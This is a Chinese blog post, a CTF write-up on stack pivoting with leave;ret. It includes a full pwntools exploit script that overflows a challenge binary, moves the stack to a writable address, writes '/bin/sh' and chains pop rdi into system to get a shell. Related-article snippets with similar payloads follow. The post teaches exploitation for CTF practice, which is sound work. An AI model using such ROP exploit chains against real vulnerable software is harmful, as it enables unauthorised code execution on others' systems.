从一道简单的pwn题 认识 栈转移

最新推荐文章于 2024-02-23 14:43:20 发布
最新推荐文章于 2024-02-23 14:43:20 发布
阅读量527 收藏 1
点赞数
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/89604313
版权

这个题 好像是  bugku的 但是好像这个题 给换了   

这个是 64位的程序 

 这个题  难搞点就是  栈空间不够   可以看的出来 我们s的地方是  rbp-0x10的地方 那么 返回地址 应该就是 rbp-0x18的地址 

如果我们想把这个搞定  那么 要考虑一下 栈转移   栈转移 有很多高级的用法  这里 就浅显的说一些简单的 栈转移 

栈转移 其实就是利用的是   这两个语句 

leave 这个 可以拆分成  mov esp  ebp  pop  ebp    这里的  pop ebp 就可以把我们的ebp 值改变了    那么 栈空间就转移了  

我们就可以确定我们写入的地址是多少了   那么 我们在构造一下 参数就行了  

具体看exp 就好

#coding:utf-8

from pwn import *

io=process('./pwn3' )
#io=remote('114.116.54.89',10000)


elf=ELF('./pwn3')


read_addr=0x40072a
system_call=0x40075a
write_addr=0x601fa0

pop_rdi=0x00000000004007d3


pay='a'*0x10+p64(write_addr+0x10)+p64(read_addr)
io.sendline(pay)

pay="/bin/sh\x00"

pay+='a'*(0x10-len(pay))
pay+=p64(0)
pay+=p64(pop_rdi)
pay+=p64(write_addr)
pay+=p64(0x40075a)

io.sendline(pay)
io.interactive()

 

pipixia233333
关注
专栏目录
透过一道基础pwn溢出感受函数执行时候的的变化。
admin的博客
10-04 243
源:基本 ROP - CTF Wiki (ctf-wiki.org) 的ret2libc的例一。 这道简单,bin/sh和system的地址都给了,只需要控制程序执行流返回到相应的地址即可。但是我在编写payload的时候遇到了点小疑问。 为什么上system的地址和他的参数bin/sh的地址之间要隔着四个字节呢? bin_sh_addr = 0x08048721 system_addr = 0x08048303 payload = b'a' * 112 + p32(bin_sh_...
pwn】 关于迁移
wintersun的地带
05-19 3247
[pwn] 关于迁移在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell呢。以下为科普以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4;push ebp;mov ebp,esp;来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。执行完函数后会进行一系列操作来还原现场leave;ret; 这
一道pwn入门的练习
10-23
直接以一个非常简单溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN型之迁移
swedsn
07-30 1885
文章目录前言0x1 :基本知识:0x2 :利用思路 :0x3 :实例讲解 前言 0x1 :基本知识: (1)存在溢出,但是溢出的长度不够,你输入的内容最多只能覆盖掉ret返回地址,而之后的rop链无法构造。 (2)就是之前的.bas 0x2 :利用思路 : 0x3 :实例讲解 ...
迁移
qq_45691294的博客
01-05 672
文章目录迁移[Black Watch 入群]PWN 迁移 迁移目一般有一个特点,就是可以产生溢出,但是溢出的长度太短导致无法写完整的payload,而实质就是只能控制ebp的情况下去控制住eip从而控制程序的执行流 以 32 位程序举例,在使用 call 这个命令,进入一个函数的时候,程序会进行一系列操作: push eip+4; push ebp; mov ebp,esp; 来保护现场,避免执行完函数后堆不平衡以及找不到之前的入口地址。 执行完函数后会进行一系列操作来还原现场 lea
pwn--迁移
weixin_44642009的博客
04-17 1026
迁移–ROP 本次实验我们使用lab4的可执行文件。 在开始之前我们需要明确一些问以及需要注意的地方,以下我会讲到,这也是在实验过程中我碰到的一些情况和解关键: 为什么使用迁移? 由上图可知,程序开辟的堆大小是0x50字节,而read函数输入可以输入0x60字节,明显存在溢出的可能,不过可输入的字节数不是足够多,空间较小,不足以使我们填入足够的ROP链,所以我们需要迁移。 ...
PWN——迁移
L2329794714的博客
08-29 1640
简单一句话就是控制esp指针的指向。实现指令:eave;ret 指令Leave等价于:其实就是在做恢复上一次空间的操作。但这过程中能恢复到上次的的关键数据为当前ebp指向地址上值(oldebp),当我们通过溢出覆盖原本的oldebp值时,然后将leave;ret 程序段地址放在返回地址上,那么就可以实现将esp迁移至我们想要的地方(取决于oldebp上的覆盖的地址,注意这里会抬高4字节,64位抬8字节)。第一次leave第一次ret:因为esp还是指向leave;.........
pwn1 一道pwn练习
05-07
pwn练习
pwn 基础
y0un9er
08-18 1021
简要得介绍了一下的思路
一道加深对后进先出的理解(python)
12-21
今天有人问了我一道,如下: 意思就是给定一个顺序为654321的,判断下面的是否是正确的。 解思路 的元素存储与利用是遵循后进先出(LIFO)的,如下图,我们可以用一个半开口的方框表示,开口的一端称为...
PWN入门之迁移
weixin_44681716的博客
04-24 3111
实验目的 在我们仅仅只能够控制ebp的情况下,我们怎么才能够控制eip去拿到我们的shell?使用迁移的方法便能解决这个问。在这里用lab4的文件来举例。 实验文件 链接:https://pan.baidu.com/s/1CW0eZM-yFNZfOfqlLnxqCw 提取码:tmo3 实验步骤 首先来介绍一下迁移是什么? 以32位程序举例,在使用call这个命令,进入一个函数的时候,程序会进...
Linux PWN技巧之迁移
小小鱼的博客
02-16 1898
简介 迁移简单将就是控制EBP/RBP、ESP/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现控制上执行内容、控制程序执行流程的目的。 迁移一般会将帧指向bss段(其他可读写内存段也可以),这种技巧是为了解决上空间太小,不够写入完整payload的情况。比如有个程序存在溢出的漏洞,但溢出的长度不够,只够覆盖到返回地址,不能读入完整的rop链,这种情况就可能要用到迁移的技巧了 利用介绍 以32位程序为例,描述一下迁移的核心思想。 首先要理解leave和ret汇编指令的作用: lea
pwnnum43---迁移
tbsqigongzi的博客
05-03 732
BUUCTF-PWN-ciscn_2019_es_2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在溢出 开启NX保护-----堆不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下伪代码 可以看到read函数读入0x30字节给s,可是s是0x28字节大小,只相差0x8字节,只能覆盖ebp和函数返回地址,而程序中无直接getshell的函数,程序
ctf pwn
m0_64195960的博客
04-11 1540
2022年3月21迁移 这道迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
pwn练习
最新发布
WuMing_Z的博客
02-23 1693
程序分析:main函数中只存在system("/bin/sh")函数,所以nc可直接拿到权限)nc指令:远程连接对方服务器,对方服务器有什么程序就会执行什么程序nc(ip + 端口号)例如在已给的靶机信息node5.buuoj.cn:29650中node5.buuoj.cn是域名,冒号后的29650是端口号(注意冒号要改为空格)然后直接cat flag 即可。
[Black Watch 入群]PWN-迁移
个人笔记
04-20 520
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
CTF-PWN迁移
m0_53921051的博客
04-05 929
帧介绍 C语言函数调用帧_大佬菜菜带带的博客-CSDN博客 迁移背景 在溢出构造rop链时,有时我们会遇到构造空间不够的情况。比如我们需要构造0x30字节的数据,而read()只能读入0x28字节。但是我们可以控制ebp及ret的值,此时可以利用迁移的方法拓展空间。 迁移条件 能够控制rbp及ret的值。 拥有一块可执行的内存,并且可以连续两次控制该内存。 迁移原理 在函数调用完返回时,会执行leave,ret两条汇编指令。 leave: mov esp ebp; pop
[PWN] 迁移 ciscn_2019_es_2
LDX的博客
11-28 391
迁移 基础目 理解 ciscn_2019_es_2
迁移基础
Civit_的博客
03-27 251
迁移就是控制E/RBP、E/RSP寄存器,让帧指向一段我们可以控制的内存,从而实现程序执行流的目的。​ 溢出攻击时,一个条件就是上有充分的空间可以布局。当溢出空间不够时,就需要迁移来解决了。
pwn的五道基础
lllwky的博客
03-27 7634
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值